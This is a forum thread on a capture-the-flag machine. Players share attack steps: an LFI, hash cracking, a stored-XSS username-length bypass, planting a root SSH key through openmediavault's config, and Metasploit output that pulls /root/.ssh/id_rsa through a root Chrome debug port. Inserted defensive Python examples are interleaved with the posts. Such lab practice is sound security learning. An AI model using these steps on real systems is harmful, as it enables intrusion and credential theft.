Posts: 16 Threads: 0 Joined: N/A
November 22, 2022 at 10:18 PM

(November 22, 2022, 08:40 PM) meowmeowattack Wrote:
regarding xss for the entry point. i can find this information so far: rails-html-sanitizer 1.4.2 is vulnerable to cross-site scripting when `select` and `style` tags are allowed (CVE-2022-32209). it does look exploitable, but with the cookie being httponly, and there doesn't seem to be any user role changing form, i fail to think of how this would help in this exercise.
there's an /administration endpoint, not sure whether this vuln would allow us to fetch the content of that and post it to our server; from what I've read in the report on hackerone it should? I also noticed https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-site-scripting-xss ... this section mentions rich text editors... coincidentally, this challenge offers one too, but I'm kind of tired of all this guesswork at this point; it makes me think I'm just going down a huge rabbit hole.

Posts: 78 Threads: 0 Joined: N/A
November 22, 2022 at 11:08 PM

(November 22, 2022, 10:18 PM) ILoveNSA Wrote:
(November 22, 2022, 08:40 PM) meowmeowattack Wrote: [quoted in full above]

while still having the unintended way in, i copied the development.log from the target, which shows how alice logs in and visits the pages. you can see that alice browses to the login page, then logs in and then just lands on the landing page that renders the clipnotes pad. from the logs, i don't think alice is viewing any notes or reports we submit. i start to feel the concept of xss might be a rabbit hole.

Started GET "/login" for 127.0.0.1 at 2022-11-21 16:15:10 -0500
Processing by SessionsController#new as HTML
  Rendering layout layouts/application.html.erb
  Rendering sessions/new.html.erb within layouts/application
  Rendered sessions/new.html.erb within layouts/application (Duration: 0.9ms | Allocations: 467)
[Webpacker] Everything's up-to-date. Nothing to do
  User Load (0.2ms)  SELECT "users".* FROM "users" WHERE "users"."id" = ? LIMIT ?  [["id", 1], ["LIMIT", 1]]
  ↳ app/controllers/application_controller.rb:15:in `is_admin?'
  Rendered layout layouts/application.html.erb (Duration: 5.6ms | Allocations: 2267)
Completed 200 OK in 7ms (Views: 5.9ms | ActiveRecord: 0.2ms | Allocations: 2683)

Started POST "/login" for 127.0.0.1 at 2022-11-21 16:15:11 -0500
Processing by SessionsController#create as HTML
  Parameters: {"authenticity_token"=>"[FILTERED]", "session"=>{"username"=>"alice", "password"=>"[FILTERED]"}, "button"=>""}
  User Load (0.1ms)  SELECT "users".* FROM "users" WHERE "users"."username" = ? LIMIT ?  [["username", "alice"], ["LIMIT", 1]]
  ↳ app/controllers/sessions_controller.rb:11:in `create'
Redirected to http://derailed.htb:3003/
Completed 302 Found in 266ms (ActiveRecord: 0.1ms | Allocations: 806)

Started GET "/" for 127.0.0.1 at 2022-11-21 16:15:11 -0500
Processing by NotesController#new as HTML
  Rendering layout layouts/application.html.erb
  Rendering notes/new.html.erb within layouts/application
  Rendered notes/new.html.erb within layouts/application (Duration: 0.6ms | Allocations: 247)
[Webpacker] Everything's up-to-date. Nothing to do
  User Load (0.1ms)  SELECT "users".* FROM "users" WHERE "users"."id" = ? LIMIT ?  [["id", 1], ["LIMIT", 1]]
  ↳ app/controllers/application_controller.rb:15:in `is_admin?'
  Rendered layout layouts/application.html.erb (Duration: 4.2ms | Allocations: 2047)
Completed 200 OK in 5ms (Views: 4.6ms | ActiveRecord: 0.1ms | Allocations: 2469)
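Reading the browsing path out of a development.log by eye, as done above, does not scale once the log has a few hundred requests. The following is an added example, not code from the thread or from the challenge: a small Python parser for the Rails request-log format shown above. It groups each "Started ... Completed" block into one record, strips the ANSI colour escapes that appear as "[1m[36m" residue in the paste, returns the sequence of method/path/action/status, and flags any logged Parameters line in which a sensitive-looking value was not replaced by [FILTERED] (the keyword list is assumed to follow Rails' default filter_parameters). The sample log lines are re-typed from the excerpt above so the script runs offline.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the three requests from the development.log excerpt above,
# re-typed without the ANSI colour escapes so the script runs offline.
SAMPLE_LOG = """\
Started GET "/login" for 127.0.0.1 at 2022-11-21 16:15:10 -0500
Processing by SessionsController#new as HTML
  Rendering layout layouts/application.html.erb
  User Load (0.2ms)  SELECT "users".* FROM "users" WHERE "users"."id" = ? LIMIT ?  [["id", 1], ["LIMIT", 1]]
Completed 200 OK in 7ms (Views: 5.9ms | ActiveRecord: 0.2ms | Allocations: 2683)
Started POST "/login" for 127.0.0.1 at 2022-11-21 16:15:11 -0500
Processing by SessionsController#create as HTML
  Parameters: {"authenticity_token"=>"[FILTERED]", "session"=>{"username"=>"alice", "password"=>"[FILTERED]"}, "button"=>""}
  User Load (0.1ms)  SELECT "users".* FROM "users" WHERE "users"."username" = ? LIMIT ?  [["username", "alice"], ["LIMIT", 1]]
Redirected to http://derailed.htb:3003/
Completed 302 Found in 266ms (ActiveRecord: 0.1ms | Allocations: 806)
Started GET "/" for 127.0.0.1 at 2022-11-21 16:15:11 -0500
Processing by NotesController#new as HTML
Completed 200 OK in 5ms (Views: 4.6ms | ActiveRecord: 0.1ms | Allocations: 2469)
"""

ANSI = re.compile(r"\x1b\[[0-9;]*m")  # colour codes the dev log emits ("[1m[36m" in the paste)
STARTED = re.compile(r'^Started (\w+) "([^"]*)" for (\S+) at (.+)$')
PROCESSING = re.compile(r"^Processing by (\S+) as \w+$")
PARAMS = re.compile(r"^\s*Parameters: (.*)$")
SQL = re.compile(r"\(\d+\.\d+ms\)\s+((?:SELECT|INSERT|UPDATE|DELETE)\b.*)$")
REDIRECT = re.compile(r"^Redirected to (\S+)$")
COMPLETED = re.compile(r"^Completed (\d{3}) ")
# A parameter whose name contains one of these words must be logged as [FILTERED]
# (word list assumed to follow Rails' default filter_parameters; extend as needed).
SENSITIVE = re.compile(
    r'"[^"]*(?:passw|secret|token|_key|crypt|salt|certificate|otp|ssn)[^"]*"=>"(?!\[FILTERED\])'
)


@dataclass
class Request:
    method: str
    path: str
    client: str
    started_at: str
    action: str = ""
    params: str = ""
    queries: list = field(default_factory=list)
    redirect: str = ""
    status: int = 0


def parse_rails_log(text):
    """Group a Rails development.log into one Request per Started ... Completed block."""
    requests, cur = [], None
    for raw in text.splitlines():
        line = ANSI.sub("", raw)
        if m := STARTED.match(line):
            cur = Request(*m.groups())
            requests.append(cur)
        elif cur is None:
            continue  # noise before the first request
        elif m := PROCESSING.match(line):
            cur.action = m.group(1)
        elif m := PARAMS.match(line):
            cur.params = m.group(1)
        elif m := SQL.search(line):
            cur.queries.append(m.group(1).strip())
        elif m := REDIRECT.match(line):
            cur.redirect = m.group(1)
        elif m := COMPLETED.match(line):
            cur.status = int(m.group(1))
    return requests


def browsing_path(requests):
    """What the logged session actually did: one (method, path, action, status) per request."""
    return [(r.method, r.path, r.action, r.status) for r in requests]


def unfiltered_secrets(requests):
    """Requests whose logged Parameters line carries a sensitive-looking value in clear text."""
    return [r for r in requests if SENSITIVE.search(r.params)]


if __name__ == "__main__":
    for step in browsing_path(parse_rails_log(SAMPLE_LOG)):
        print("%-5s %-8s %-28s %d" % step)
```

Run against the excerpt, browsing_path returns exactly the three steps the post describes (GET /login, POST /login redirecting to /, GET / rendered by NotesController#new) and unfiltered_secrets returns nothing, because alice's password is logged as [FILTERED]. Pointing the same parser at a production log is a cheap check that filter_parameters actually covers every secret-bearing field before a log file ends up readable through an LFI like the one discussed in this thread.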
Posts: 7 Threads: 0 Joined: N/A
November 23, 2022 at 2:10 AM

(November 22, 2022, 03:49 PM) s0jnik Wrote:
now start from scratch
Do you have an entry point already?

Not yet, I'm about to start now

Posts: 78 Threads: 0 Joined: N/A
November 23, 2022 at 2:17 AM

(November 22, 2022, 05:45 AM) deer Wrote:
(November 21, 2022, 07:48 PM) toinkz Wrote:
How did the recently patched unintended privilege escalation Chrome Driver root work?

it is not patched still

(November 22, 2022, 04:43 AM) meowmeowattack Wrote:
(November 21, 2022, 09:32 PM) nuki Wrote:
Exa Wrote: I found the LFI. Any hint on what to do next?

Edit: I found development.sqlite3.
Cracking the hash of toby works pretty well, unfortunately it doesn't lead anywhere. I already tried bruteforcing the ssh login for the user associated to toby with a list of album names and artists from https://en.wikipedia.org/wiki/Toby_Wright
No success so far for the last couple of hours

the cracked hash can be used to login as openmediavault-webgui, but there doesn't seem to be anything exploitable by examining the version in the /etc/openmediavault/config.xml; it does highlight two users, one does exist on the filesystem, one doesn't

if you have an ssh as openmediavault-webgui, I offer you a couple nudges
/usr/sbin/omv-firstaid
127.0.0.1:80
after recent changes, resetting admin password using /usr/sbin/omv-firstaid no longer works

Posts: 7 Threads: 0 Joined: N/A
November 23, 2022 at 3:54 AM

(November 23, 2022, 02:17 AM) meowmeowattack Wrote: [quoted in full above]

how did you get in

Posts: 28 Threads: 0 Joined: N/A
November 23, 2022 at 4:06 AM

(November 23, 2022, 02:17 AM) meowmeowattack Wrote: [quoted in full above]

Looks like the patches finally went into effect. For those who asked about the chrome debugger privesc... netstat showed a few high numbered ports on localhost. Curling them returned some chrome debug info. Additionally, pspy showed root running several processes like

/usr/bin/google-chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-gpu --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --incognito --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.com.google.Chrome.bmAxEF data:,

Well, you could use auxiliary/gather/chrome_debugger in metasploit to fetch any file you wanted like /root/root.txt or /root/.ssh/id_rsa from the remote machine as long as you forwarded the correct port. It would work like this:

Module options (auxiliary/gather/chrome_debugger):

   Name      Current Setting    Required  Description
   FILEPATH  /root/.ssh/id_rsa  no        File to fetch from remote machine.
   RHOSTS    127.0.0.1          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     38541              yes       The target port (TCP)
   TIMEOUT   10                 yes       Time to wait for response
   URL                          no        Url to fetch from remote machine.

msf6 auxiliary(gather/chrome_debugger) > run
[*] Running module against 127.0.0.1
[*] Attempting Connection to ws://127.0.0.1:38541/devtools/page/E5DA28A5144336BC1B01J0A4358641C54
[*] Opened connection
[*] Attempting to load url file:///root/.ssh/id_rsa
[*] Received Data
[*] Sending request for data
[*] Received Data
[*] Stored file:///root/.ssh/id_rsa at /home/kali/.msf4/loot/20221120020124_default_127.0.0.1_chrome.debugger._797813.txt
[*] Auxiliary module execution completed

Posts: 78 Threads: 0 Joined: N/A
November 23, 2022 at 4:18 AM

got root, user flag was through the previously unpatched mass assignment. i haven't quite figured out how to achieve it via the intended approach though.
the way i could still get in was because i copied all files under /var/www/ prior to the patch coming into effect. in the /var/www/rails-app folder, there is a git repo, and one of the git log entries contains alice's password. So, i got admin to the web there.
for root, you don't need to use omv-firstaid at all. follow this link to get the correct format of ssh public key: https://forum.openmediavault.org/index.php?thread/7822-guide-enable-ssh-with-public-key-authentication-securing-remote-webui-access-to/ then create a new user entry in the omv config.xml for the user root. then use /usr/sbin/omv-rpc to force apply the changes. then you can login as root using your private key
anyone able to succeed the foothold part using the intended way, please share

There is a marcus user that browses the notes, the relevant code is like this:

import sqlite3
from time import sleep

# DB, url and driver (a Selenium WebDriver) are set up earlier in the bot script;
# that part was not posted.
with sqlite3.connect(DB) as conn:
    cur = conn.cursor()
    cur.execute("SELECT * FROM reports")
    rows = cur.fetchall()
    if not rows:
        print("nothing here.")
    else:
        for row in rows:
            try:
                id = str(row[0])
                note_id = str(row[1])
                # remove the report first so each one is processed only once
                print(f"delete {id} - {note_id} from reports")
                sql = 'DELETE FROM reports WHERE id=?'
                cur = conn.cursor()
                cur.execute(sql, (id,))
                conn.commit()
                # open the reported note in a fresh tab of the headless browser
                print(f"visiting {id}")
                driver.execute_script("window.open('');")
                driver.switch_to.window(driver.window_handles[-1])
                #driver.set_page_load_timeout(30)
                sleep(10)
                driver.get(url + "/clipnotes/" + note_id)
                sleep(30)
            except Exception as e:
                print(str(e))
Posts: 0 Threads: 0 Joined: N/A
November 23, 2022 at 5:33 AM

(November 23, 2022, 04:18 AM) meowmeowattack Wrote: [quoted in full above]
What is Alice's password?

Posts: 28 Threads: 0 Joined: N/A
November 23, 2022 at 5:58 AM

(November 23, 2022, 04:18 AM) meowmeowattack Wrote: [quoted in full above]
Have not succeeded on the intended foothold method yet, but I am having some promising results so far. The username field when you register will only take 40 chars client side, but you can intercept this request and send more, like 48 chars plus xss payload (url encode entire string). Then you can login with the entire url-decoded string, create empty new clipnote, and xss should execute.

Posts: 6 Threads: 0 Joined: N/A
November 23, 2022 at 6:48 AM

(November 23, 2022, 04:18 AM) meowmeowattack Wrote: [quoted in full above]
Did you also encode the sshpubkey in config.xml in any way? RFC4716 format won't be taken and ends in error with stack trace.
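The earlier post about the registration form (a 40-character limit on the username that is enforced only client-side, while the server stores whatever the intercepted request carries) is the kind of gap this added example addresses. It is not code from the challenge or from anyone in the thread; it assumes an allowed username character set of [A-Za-z0-9._-] and simulates the server's handling of the request in plain Python, with two independent controls: the same length and charset rules enforced again on the server, and output encoding wherever the name is rendered, so a future validation gap still cannot turn into stored XSS.

```python
import html
import re

MAX_USERNAME_LEN = 40  # the limit the registration form applies client-side
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]+")  # assumed allowed character set


def validate_username(raw):
    """Server-side checks; the form's maxlength is a hint to the user, not a control."""
    if not isinstance(raw, str) or not raw:
        return ["username is required"]
    errors = []
    if len(raw) > MAX_USERNAME_LEN:
        errors.append(f"username longer than {MAX_USERNAME_LEN} characters")
    if not USERNAME_RE.fullmatch(raw):
        errors.append("username contains characters outside [A-Za-z0-9._-]")
    return errors


def register(raw):
    """Simulated server side of the registration request: reject or accept the name."""
    errors = validate_username(raw)
    if errors:
        return {"ok": False, "errors": errors}
    return {"ok": True, "username": raw}


def render_welcome(username):
    """Output-encode on render as well, so a gap in validation cannot become XSS."""
    return f"<h1>Welcome, {html.escape(username, quote=True)}</h1>"


# Constructed inputs: a normal name, and an oversized name with markup appended,
# the shape the post above describes (plain tags, not a payload).
SAMPLE_GOOD = "alice"
SAMPLE_OVERSIZED_MARKUP = "a" * 48 + "<b>not a name</b>"

if __name__ == "__main__":
    for name in (SAMPLE_GOOD, SAMPLE_OVERSIZED_MARKUP):
        print(register(name))
    print(render_welcome("x<b>y"))
```

In a Rails application the same two controls are a model-level validates :username, length: { maximum: 40 } plus a format validation, and leaving ERB's default escaping in place (no raw or html_safe on user-supplied strings); rails-html-sanitizer only enters the picture for rich text fields that must keep some markup, which is exactly where the allowlist discussed earlier in the thread matters.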